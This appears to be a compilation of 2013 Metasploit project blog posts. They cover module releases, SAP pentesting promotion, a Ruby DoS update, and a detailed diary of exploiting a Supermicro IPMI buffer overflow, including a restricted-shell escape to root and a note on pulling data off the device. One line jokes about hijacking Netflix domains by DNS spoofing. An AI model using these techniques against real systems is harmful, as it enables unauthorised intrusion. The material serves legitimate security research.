Tod Beardsley is the Engineering Manager at Rapid7 for the Metasploit Project, the world-renowned open source penetration testing platform. He has over twenty years of hands-on security knowledge, reaching back to the halcyon days of 2400 baud textfile BBSes and in-band telephony switching. Since then, he has held IT Ops and IT Security positions in large footprint organizations such as 3Com, Dell, and Westinghouse. Today, he is passionate (some might say militant) about open source software development, open source security research, and data liberation. He can often be found on Freenode IRC and Twitter as "todb."

 

Our second speaker and international hacker of mystery, Juan Vazquez, has been working as a security consultant on both offensive and defensive tasks since 2006. Juan works on the Metasploit project, dividing his time between writing exploits and helping the Metasploit community with their contributions. Juan started contributing to Metasploit 3 years ago as an open source contributor and joined the Rapid7 team in 2011.

 

There are two showings for this webcast:

 

Research Report: SAP Penetration Testing Using Metasploit – How to Protect Sensitive ERP Data

 

Prefer reading to watching a webcast? Check out this in-depth research paper, which explores a number of methods to exploit vulnerabilities within the SAP enterprise resource planning (ERP) system. These methods have been implemented and published in the form of more than 50 modules for Metasploit, a free, open source software for penetration testing.The modules enable companies to test whether their own systems could be penetrated by an attacker.

 

Download SAP Research Report here

Meterpreter Extended API

This week, we've got some new hotness for Meterpreter in the form of OJ TheColonial Reeves' new Extended API (extapi) functionality. So far, the extended API is for Windows targets only (hint: patches accepted), and here's the rundown of what's now available for your post-exploitation delight:

 

  • Clipboard Management: This allows for reading and writing from the target's clipboard. This includes not only text, like you'd expect, but a seamless download of files and images as well. Useful for grabbing interesting but temporary data such as passwords or files copies from remote sources.
  • Service Management:  Meterpreter users are familiar with the overview provided by regular 'ps', but the service management interface allows for more detailed readouts of running services; most notably, DACLs, load order group, the start up status, and if that service can interact with the desktop.
  • Window Management: Gives the ability to easily enumerate all open Windows. This can help penetration testers discover if a particular target is worth VNC'ing in on at the moment.

 

In addition to all this, the Extended API structure makes it a handy place to start prototyping new Meterpreter functionality for Meterpreter hackers who aren't named OJ. It's pretty well organized from the get-go and doesn't require refactoring to core Meterpreter functionality to get something put together and demo-able quickly. So, if you've got an idea of what you'd like to see Meterpreter make easier that's relevant to your particular pen-testing workflow, this is a great place to start.

 

New HttpServer / HttpClient HOWTO

Not too long ago, we announced Wei @_sinn3r Chen's Browser Exploit Server, a nice Ruby mixin that consolidates a lot of the grunt work behind developing exploits. This week, Wei has fleshed out more of the exploit dev documentation with a nice, compact HOWTO-style guide on writing modules that leverage the strengths of the revised HttpServer and HttpClient mixins, so read up on it here.

 

I've been bugging sinn3r to put together some YouTube videos on the process of exploit dev as well, complete with the requisite thumpa-thumpa music, but you are welcome to beat him to it by following his documentation for your next browser exploit. The kids love the YouTube, and watching exploit devs type is apparently an effective teaching technique for some.

 

SAP for People Closer to GMT

If you missed last week's SAP hacking webcast by Juan Vazquez, Christian Kirsch, and yours truly, we'll be hosting it again live next week. You can register here, and it'll be held mid-afternoon for those of you who are observing a European time zone. We hear SAP is big over there, so we'll be getting online early in the AM here in Austin to make sure you all can participate in our overview of the state of the art of SAP reconniscance and exploitation with Metasploit.

 

New Modules

It's an even split this week between exploit and non-exploit modules, with eight total. Rails has another DoS that we exercise this week, thanks to sinn3r's Rails Action View auxiliary module which exploits CVE-2013-6414; now would be a fine time to check your Rails version and update accordingly to get the fix.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

SAP SAPpy SAP SAP

We've been all SAP all the time here in the Independent Nations of Metasploit, and expect to be for the rest of the week. You might recall that Metasploit exploit dev, Juan Vazquez published his SAP survey paper a little while back; on Tuesday, we did a moderated twitter chat on the hashtag #pwnSAP with the major SAP-focused Metasploit contributors Bruno Morrison, Chris John Riley, and Dave Hartley; and today (Thursday, December 5), Juan and I will be hosting a webcast on the various and sundry SAP exposures that Metasploit covers, and There Will Be Demos and Q&A, so it should be fun.

 

The whole thing has been pretty eye-opening for me; there's been a bunch of movement in the research over the last 18-24 months or so, and I'm delighted that so many talented people are making noise about this in the form of Metasploit modules. Hopefully all this will raise some awareness of the risks and exposures involved with running huge, complex, interconnected systems like ERP in general.

 

Silverlight Exploit

In other (non-SAP) news, this week, we're shipping our first ever Silverlight exploit, which exploits MS12-022 (aka, CVE-2013-0074). That's exciting. Use your DNS MITM attacks to jack the Netflix domains, wait for Orange is the New Black fans to connect, and profit!

 

It's important to know that the vulnerability is in Silverlight proper, and not IE, so while our exploit targets Microsoft Internet Explorer only today, the vulnerability is actually cross-platform. So, now that we've done this groundwork of demoing how to write a Silverlight exploit in Metasploit, all we need now is some enterprising young researcher to port this to a working Apple implementation. Have at it!

 

New Modules

I know, I know, last week we kind of cheated you out of your usual complement of new modules, thanks to the the Ruby float bug. To make it up to you, we have 14 new modules this week, including the Silverlight module mentioned above. Have at it! There's a lot of neat new attacks in there, so thanks again to our beloved community contributors for their efforts on these.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

If you’re conducting security assessments on enterprise networks, chances are that you’ve run into SAP systems. In this blog post, I’d like to give you an introduction to SAP and ABAP to help you with your security audit.

 

The full SAP solution (ERP or SAP Business Suite) consists of several components. However, to manage the different areas of a large enterprise, probably one of the better known components or features of the SAP solution is the development system based on ABAP, the language used to build business applications on the SAP platform.

 

The traditional way to execute ABAP code is to use a transaction, for example, from any existing SAP client (which will be reviewed later):

 

image001.png

 

One way to simplify the concept of the SAP platform is to think of it as an application server. Most readers are probably familiar with Java-related application servers, so it’s easy to think of SAP as an ABAP application server. In fact, SAP is capable of running ABAP applications as well as applications written in Java. The name of SAP’s application server is SAP NetWeaver...

 

If you’d like to know more about this platform and how to pentest it with Metasploit, get your free research paper now "SAP Penetration Testing Using Metasploit - How to Protect Sensitive ERP Data."

 

If you'd like to join a live discussion on the topic, we're also hosting a tweet chat tomorrow, December 3, at noon ET under the hashtag #pwnSAP. Or you can register for our webcast on Thursday, December 6 at 2:00pm ET, "Become an SAP Pwn Star: Using Metasploit for ERP Security Assessments."

Metasploit 4.8.1 Released

Thanks to the revelations around the recent Ruby float conversion denial of service, aka CVE-2013-4164 discovered and reported by Charlie Somerville, this week's release is pretty slim in terms of content; on Friday (the day of the first disclosure), we pretty much dropped everything and got to work on testing and packaging up new Metasploit installers that ship with Ruby 1.9.3-p484, which fixes the bug.

Ruby Logo CC-SA 2.5

As far as we are able to tell, it's merely a denial of service, so the worst that happens is that your given Ruby application can crash out with a segfault. Like most other Ruby bugs that lead to segfaults, we haven't been able to tease any code exec out, but it's not completely impossible.

 

So, in case it's not absolutely clear, Metasploit Community, Express, and Pro are all vulnerable as of Metasploit 4.8.0 and prior; again, we don't have a remote code exec path, but getting your assessment knocked out from under you can be more than a little unpleasant. Update to Metasploit 4.8.1 before you start your next engagement, and you'll be golden. We've also updated the Metasploit Framework repo to suggest ruby-1.9.3-p484, so take a moment to install that as well on your development environment if you're that sort.

 

We're not the only ones who were exposed to this, of course. If you have control over your Ruby installations, you'll want to update if you haven't already. If you rely on a cloud provider or some other kind of provisioning service, you should get with them; to take just one example, Sebastian Saunier has a procedure to update all your Heroku apps, all nicely scripted out in this gist.

 

PS: ruby-lang.org, it's a little unneighborly to disclose on a Friday; I'm sure the world's Ruby administrators could have used an extra weekday or two. No time is a good time for new vulns, but when Rapid7 discloses, we make every effort to make sure we coordinate around Wednesdays.

 

New Modules

Alas, we just have the one new exploit that managed to get landed before the Ruby code review and update freak out. I Promise we'll have more next week, including the Metasploit module that exercises the aforementioned bug (it's landed on our development repo, but that won't be released until next week).

 

Exploit modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Browser Exploit Server

This release includes the much vaunted and anticipated BrowserExploitServer (BES) mixin, the brainchild of Metasploit exploit developer Wei @_sinn3r Chen. Metasploit, at its core, is designed to be both an exploit delivery system and exploit development system, so this new mixin should help tremendously with the latter. BES, in a nutshell, saves you, the exploit developer, a ton of time when it comes to common chores like operating system identification, browser identification, and plugin detection. It also adds some best-effort client vulnerability detection before firing off the exploit, which is handy if you need to keep your super-secret 0-day still super-secret.

 

There's a few other niceties in there as well, but I don't want to completely spoil the surprise. Sinn3r has written up some comprehensive documentation on using BrowserExploitServer as well as a bunch of refreshed hints on using HttpServer (which may or may not be an exploit). Note that it's on the module writer to decide which one is the right one to use; there are times where you may not want or need all the browser-y things that BES provides.

 

supermicro-ipmi.gif

IPMI Exploiter's Diary

This week also sees the release for a proper exploit on one of the recently disclosed IPMI vulnerability; when the process of developing a reliable exploit has some particularly novel aspect, Metasploit exploit developer Juan Vazquez has a habit of churning out some really fasciniating notes on the process. If you haven't already, check out his blog post, Exploiting the Supermicro Onboard IPMI Controller. It's a pretty detailed look at the process he and discoverer HD Moore went through to get reliable code execution on these buggers, so if you're interested in that sort of thing, or especially if you're stuck on something similiar, posts like that one can really help you out.

 

KiTrap0D, Modularized

Finally, the other exploit module this week is, in fact, the first from Meterpreter grandmaster OJ TheColonial Reeves. While cleaning up Meterpreter, he noticed that the KiTrap0D implementation on Meterpreter's 'getsystem' function could be a little flakey. By default, Meterpreter supports a number of methods for privilege escalation to SYSTEM privileges, and attempts each one of them in order until one succeeds or they have all failed. While KiTrap0D is a fine strategy for this, it did occasionally crash the Meterpreter getsystem function, or worse, BSOD the box. Needless to say, the getsystem call shouldn't result in this kind of behavior and so the decision was made to change getsystem so that it doesn't make use of exploits like this. As a result, KiTrap0D was removed from getsystem, and turned around into a regular local exploit module.

 

New Modules

Including the two exploit modules mentioned above, we have seven new modules this week. And yes, that's a compressed file memory bomb DoS module. No, it's not from 1988.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Last week @hdmoore published the details about several vulnerabilities into the Supermicro IPMI firmware. With the advisory's release, several modules were landed into Metasploit in order to check Supermicro's device against several of the published vulnerabilities:

 

ModulePurpose
smt_ipmi_static_cert_scanner

This module can be used to check devices using an static SSL certificate shipped with Supermicro Onboard IPMI controllers. (CVE-2013-3619).

smt_ipmi_url_redirect_traversalThis module can be used to abuse a directory traversal on the url_redirect.cgi component and download files with root privileges. Authenticated access to the web interface is required.
smt_ipmi_cgi_scannerThis module can be used to remotely check if a device if vulnerable to two unauthenticated remote buffer overflow, respectively on the login.cgi (CVE-2013-3621) and close_window.cgi (CVE-2013-3623) components.

 

Just a day after the advisory's release we were able to finish a functional exploit for one of the unauthenticated overflows (CVE-2013-3623), allowing to get root access to the device through the close_window.cgi component on the web interface.

 

This exploit development was quite interesting because we had just remote restricted access to a real Supermicro device, running the firmware SMT_X9_214 and, of course, emulation. While emulation is a great resource to search for vulnerabilities and development of proof of concepts, often it isn't enough to ensure a real live working exploit. In this blog we would like to share a couple of funny tricks we used to end the real live exploit. Hope you enjoy!

 

Traversal to the rescue

 

The first requirement in order to deploy a real-live working exploit is to know which common memory protections (NX, ASLR) apply. In order to get this information the Directory Traversal vulnerability on the url_redirect.cgi was used. Since the vulnerability allows access to arbitrary files with root privileges, even with restricted web access, this one was perfect to get some environment information. The trick here was to use the directory traversal to read "/proc/self/maps". Even when the maps would be the url_redirect.cgi's one, it would be good enough to check memory protections applied to cgi's processes, and even when we were aware of the lack of ASLR for the main executable and libraries, thanks to the @hdmoore's previous experience with the UPnP exploit, we were able also to discover stack and heap executables:

 

00012000-00033000 rwxp 00012000 00:00 0          [heap]

bee78000-bee8d000 rwxp bee78000 00:00 0          [stack]

 

This information was highly valuable in order to design the exploit for the close_window.cgi overflow, where the space and badchars limitations, would make a "return into libc-system" really hard otherwise!

 

Details matter

 

With the information above, and the help of qemu, a first version of the exploit could be developed. Still not accurate enough to get real live shells! Indeed, when exploiting, details and the environment are important things to have into account, and the traversal directory vulnerability, even when powerful, was not enough to get a session. In order to end the exploit on a reasonable time, collect debug information about the process on the real device became a requirement.

 

Having restricted shell access to the real Supermicro's device, was time to check what could be done with it:

 

ATEN SMASH-CLP System Management Shell, version 1.04
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved

-> help
/

  The managed element is the root

  Verbs :
  cd
  show
  help
  version
  exit

->









 

SSH access provides a restricted SMASH System Management Shell, which indeed isn't very useful for environment inspection / exploiting debug. Even when the command line help isn't very encouraging, neither the SMASH's specification from the DMTF, we had access to the firmware and the ATEN SMASH binaries. Fortunately, after digging a little around them, something interesting was found. While following the code responsible of handling the command line, close to the parsing of pipes ("|") and semicolon characters (";") the parsing of the next word keys is found:

 

shell_command.png

Specially interesting is to find the reserved word "shell", so time for a new test:

 

-> shell test
Change shell to test
changing shell fails.: No such file or directory

->









 

Interesting! So looks like a shell comand exists indeed. A little more of static analysis reveals which the shell command not only exists, but should allow easily arbitrary command execution :

 

shell_exec.png

Time to test:

 

-> shell ls
Change shell to ls
SFCB        bin        dropbear    lib        lost+found  proc        sys        usr        web
SMASH      dev        etc        linuxrc    nv          sbin        tmp        var        wsman

->









 

Looks good, one more test...

 

-> shell sh
Change shell to sh
# uname -a
Linux (none) 2.6.17.WB_WPCM450.1.3 #5 Wed Apr 24 10:53:55 PDT 2013 armv5tejl unknown
#









 

And a root shell opens in front of us! (SMT_X9_315 firmware fixes the "shell sh" escape). With a root shell available, in order to end the development of the exploit we chose to configure generation of core dumps to the /tmp folder, mounted with rw and enough space available:

 

# mount
rootfs on / type rootfs (rw)
/dev/root on / type cramfs (ro)
proc on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /tmp type tmpfs (rw)
devpts on /dev/pts type devpts (rw)
/dev/mtdblock1 on /nv type jffs2 (rw)
none on /tmp type tmpfs (rw)
/dev/mtdblock4 on /web type cramfs (ro)
# df -h
Filesystem                Size      Used Available Use% Mounted on
rootfs                  20.0M    20.0M        0 100% /
/dev/root                20.0M    20.0M        0 100% /
none                    36.0M      1.1M    34.9M  3% /tmp
/dev/mtdblock1            1.3M    320.0k    960.0k  25% /nv
none                    36.0M      1.1M    34.9M  3% /tmp
/dev/mtdblock4            3.9M      3.9M        0 100% /web








 

To extract the core dumps we used openssl s_server and the legit web server certificate to set up a fake HTTP server, allowing external access to the /tmp directory contents. Several core dumps later we were able to make the exploit work smoothly on the real device :


msf exploit(smt_ipmi_close_window_bof) > show options

Module options (exploit/linux/http/smt_ipmi_close_window_bof):

   Name     Current    Setting  Required  Description
   ----       ---------------  --------     -----------
   Proxies                                  no         Use a proxy chain
   RHOST                                 yes       The target address
   RPORT                                 yes       The target port
   VHOST                                 no         HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting                        Required  Description
   ----  ---------------                        --------  -----------
   CMD   echo metasploit > /tmp/metasploit.txt  yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214


msf exploit(smt_ipmi_close_window_bof) > rexploit
[*] Reloading module...

[*] - Sending exploit...
[*] Exploit completed, but no session was created.

 

Checking the proof of success on the Supermicro's device:

 

ATEN SMASH-CLP System Management Shell, version 1.04
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved


-> shell sh
Change shell to sh
# cd /tmp
# pwd
/tmp
# cat metasploit.txt
metasploit








 

Definitely, it you are using Supermicro's motherboard, you should review the information and updates on the Supermicro IPMI Firmware Vulnerabilities article, and apply the vendor's updates if necessary.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments

Filter Blog

By date: By tag: